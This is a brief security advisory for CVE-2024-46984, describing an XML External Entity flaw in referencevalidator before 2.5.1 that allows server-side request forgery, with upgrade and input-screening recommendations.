CVE-2024-46984

Name of the Vulnerable Software and Affected Versions referencevalidator versions prior to 2.5.1

Description The profile location routine in the referencevalidator commons package is vulnerable to XML External Entities attack due to insecure defaults of the used Woodstox WstxInputFactory. A malicious XML resource can lead to network requests issued by referencevalidator and thus to a Server Side Request Forgery attack. The vulnerability impacts applications which use referencevalidator to process XML resources from untrusted sources.

Recommendations For versions prior to 2.5.1, update to version 2.5.1 or a more recent one to resolve the issue. As a temporary workaround, consider pre-processing or manual analysis of input XML resources for existence of DTD definitions or external entities to mitigate the problem.